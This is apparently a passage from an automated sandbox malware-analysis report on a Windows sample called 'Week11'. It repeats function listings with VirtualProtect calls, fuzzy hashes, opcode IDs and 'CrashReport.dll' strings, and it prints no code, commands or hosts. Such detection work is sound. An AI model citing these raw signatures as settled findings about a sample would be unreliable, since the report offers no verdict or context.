                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: 5G4;$CrashReport.dll$E$L$L$P$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                • API String ID: 544645111-4288462540
                                • Opcode ID: 8b030d8ccd3c56a9741b341e49698a41a4d30c31955fb75d3503bbddd02aed3f
                                • Instruction ID: 3e6c72d367cace4b820deff05f12ccec4477c1f771b2cdc57d925e70083604ae
                                • Opcode Fuzzy Hash: 8b030d8ccd3c56a9741b341e49698a41a4d30c31955fb75d3503bbddd02aed3f
                                • Instruction Fuzzy Hash: A2910471E092A48EFB20C624DC447EABBB1AF91310F0480FAD44C9B282D77E5BC4CB56
                                Function 0041E596 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 158memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: =E8K$CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-4241551058
                                • Opcode ID: c4353d701fb51a2b0dffa6dd4f7b989e43846d7ef29b9452b8486dfea5942382
                                • Instruction ID: cb0166366334f97fd20b34c2e59fcc0f862cad035518c17975269d7935fb6a3f
                                • Opcode Fuzzy Hash: c4353d701fb51a2b0dffa6dd4f7b989e43846d7ef29b9452b8486dfea5942382
                                • Instruction Fuzzy Hash: DD5108B1E042A49EFB20DB25DC547EAB6B5AF91304F0480FAD44C97241D67D4FC18F96
                                Function 0041DF11 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 246COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 76d439da0879468c9b90526ccdbc8294a3ff9deeca0538f3feaac66b2afd6268
                                • Instruction ID: b74b1b957882d4cf87e958b115efe91b1eaeb00401719a61d1ad3de12e208e10
                                • Opcode Fuzzy Hash: 76d439da0879468c9b90526ccdbc8294a3ff9deeca0538f3feaac66b2afd6268
                                • Instruction Fuzzy Hash: 34A103B2E052A49AEB20CB25DC547EAB6B5EF95300F0480FAD44CAB281D6794FC5CF56
                                Function 0041E612 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 219memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 2ed099ac01734b5839e9fecc942af504e580af99a8cccfc6d444e26b65da47eb
                                • Instruction ID: 29f02d2925a9bbc4b1f9ed4a27b07f14be42d4a8db89c225359a38322e303326
                                • Opcode Fuzzy Hash: 2ed099ac01734b5839e9fecc942af504e580af99a8cccfc6d444e26b65da47eb
                                • Instruction Fuzzy Hash: F891EEB1E052649FF720CA24DC54BEAB6B5EF94300F0480FAD84C9B281D6799FC18F96
                                Function 0041DEC9 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 181memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: a40f5c731d3bbbdafb78bfce8f8c0af5b80b1a62c81510cc8b871dc4e5413caf
                                • Instruction ID: dcb01827e1df5beca015379fd467e3d6e7a4c1b7451d90e6054152a7368343a1
                                • Opcode Fuzzy Hash: a40f5c731d3bbbdafb78bfce8f8c0af5b80b1a62c81510cc8b871dc4e5413caf
                                • Instruction Fuzzy Hash: 4261F5B2E052949EFB208A25DC447EB7AB5EF91314F0480FAD44C97281D67D4FC5CB56
                                Function 0041E8DE Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 172memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: c03d5b0dc5baddca9ba271c35949d28475151da9e72dc3d2ea4d164f164e34c8
                                • Instruction ID: 35e67c8a3b59b558272e75e3fc67bdbc3abb9c3060591f435ef62cb8cd9b40e9
                                • Opcode Fuzzy Hash: c03d5b0dc5baddca9ba271c35949d28475151da9e72dc3d2ea4d164f164e34c8
                                • Instruction Fuzzy Hash: 1C71E0B1E052A49EFB20CA24DC547EAB6B5EF95300F0480FAD44CA7681D67E5FC18F96
                                Function 0041EC2A Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 171memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 04534ad2945eb12c74019af85e0bd98c4f6d1aade11cb0dce868b4636e19a1d1
                                • Instruction ID: 34df4aaa802723cd7e0851bb1c3307afecb9022a14f89e524a76bc45b46afdb8
                                • Opcode Fuzzy Hash: 04534ad2945eb12c74019af85e0bd98c4f6d1aade11cb0dce868b4636e19a1d1
                                • Instruction Fuzzy Hash: EE71E471E052A88EFB20CB25DC547EABAB1AF51304F0480EED44DA7291DA795FC08F96
                                Function 0041E15C Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 159memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: bd841f4c8c3fa8e1de907a16782fa932cfd63a91ed947f5473c4a09782829677
                                • Instruction ID: c348faedcfdbc602bb63cd66dbf8fa8f02ce3145a13d1d8bb1fc73d402f7a07b
                                • Opcode Fuzzy Hash: bd841f4c8c3fa8e1de907a16782fa932cfd63a91ed947f5473c4a09782829677
                                • Instruction Fuzzy Hash: CC510472E082A49EFB20C624DC547EAB6B5EF91300F0480FAD44C97291D67E5FC5CB96
                                Function 0041E5B8 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 143memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: dc877d3fe7b79a28cc3d3649662ca546d540b84c0e9bf56fb1321480ad6ef9c7
                                • Instruction ID: b51d67149dbb00d868283c5381bebf80119ad10971e4809b2536dcf84b7e63c5
                                • Opcode Fuzzy Hash: dc877d3fe7b79a28cc3d3649662ca546d540b84c0e9bf56fb1321480ad6ef9c7
                                • Instruction Fuzzy Hash: DA51F3B1E042A49EFB20DB25DC547EABAB1AF51300F0480FAD44C97281D6BE4FC18B96
                                Function 0041F997 Relevance: 1.6, APIs: 1, Instructions: 116memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ead0b19ecc58213b9d06ae37420c76cee20f2efd442f9463aaeea5c73c2c00e1
                                • Instruction ID: a22f68069a9855306980c494c3448997ae5b8d0e08073f83e26fc825e49b3b0a
                                • Opcode Fuzzy Hash: ead0b19ecc58213b9d06ae37420c76cee20f2efd442f9463aaeea5c73c2c00e1
                                • Instruction Fuzzy Hash: 2141D6B2D486549BFB248B14DCC4BEB7775EB80300F2441FBD90E62180D67C6EC68E16
                                Function 00406844 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 54c194fb27ad8e3b78fa99a349d0b1540fb02fb75e8d0281de21f668eb8cc7be
                                • Instruction ID: 68017a6f9b64bf2a3d55eacd7dbf14f6d757b97c8a5a38e9a7908ae6b214f9aa
                                • Opcode Fuzzy Hash: 54c194fb27ad8e3b78fa99a349d0b1540fb02fb75e8d0281de21f668eb8cc7be
                                • Instruction Fuzzy Hash: BE310BF1D09358AFE7109634DC919EB3B38EF82304F0581BBE846555C2D53D5E968AA3
                                Function 00406676 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 1dda3596db6ced86365d738de9dbcbfb896c99216b314a41d822641646d6f75b
                                • Instruction ID: 27b3d72db6d4c9e4102c49d2a0b8fdea9b1d36b5e39453587fb26ba7be69b3d3
                                • Opcode Fuzzy Hash: 1dda3596db6ced86365d738de9dbcbfb896c99216b314a41d822641646d6f75b
                                • Instruction Fuzzy Hash: 9B313EF1D08254AFE7109630CC556FB3B38EF82304F0581BBE44AA69C1D53D5E968B63
                                Function 0040666C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b432eb99ea7be6d981de48fe8feea8b1c44bef03d4a9d04d6626f81593e97420
                                • Instruction ID: 803b4e947b9dba8bbbfd247c9ac1351694d6b3990931f683b318e264a5286070
                                • Opcode Fuzzy Hash: b432eb99ea7be6d981de48fe8feea8b1c44bef03d4a9d04d6626f81593e97420
                                • Instruction Fuzzy Hash: 43314CE1D08254AFE7109630CC55BFB3B34EF82300F0581BBE44A6A9C1D13D5E968B67
                                Function 00406858 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: b37b8ac6b1045dcc5e4679ad7b1326001a76aaec8bb1cd1f9fc2e143133f1bb9
                                • Instruction ID: 5dfabaa0502779c9556673698f864158be9eba2c41464935b1006d9cd6714dd8
                                • Opcode Fuzzy Hash: b37b8ac6b1045dcc5e4679ad7b1326001a76aaec8bb1cd1f9fc2e143133f1bb9
                                • Instruction Fuzzy Hash: 2A313AF1D08354AFE3108A30DC91AFB7B34EF82304F0581BBD44A669C2D53D5E968A53
                                Function 00406D50 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 9f9312d4a67fe1528c836305b17c3410519b1d63c77322ba58fcea7320c02a76
                                • Instruction ID: 3513981ace9329ce68b367b88346efa45b0adbe4d120b2e282f0555b26392776
                                • Opcode Fuzzy Hash: 9f9312d4a67fe1528c836305b17c3410519b1d63c77322ba58fcea7320c02a76
                                • Instruction Fuzzy Hash: CF212BF2E04114ABF3208665DC45EF77B7CEF90310F1441BBE80EA2681E53DAE958A63
                                Function 004068EE Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: de70f5704460281ce28e090cb355328a4a5a891dc6d1d7ba830e8a97c806e2fe
                                • Instruction ID: c60e1b38aafd9d8b1b2b6514fe5cebb1f1484462951c490b36691157f61a7cc5
                                • Opcode Fuzzy Hash: de70f5704460281ce28e090cb355328a4a5a891dc6d1d7ba830e8a97c806e2fe
                                • Instruction Fuzzy Hash: 3521EAB1D0D3949FE3119B34CC959AB7B34EF82300F0981FBD445569C2D53D5A9A8B53
                                Function 0041FE1D Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
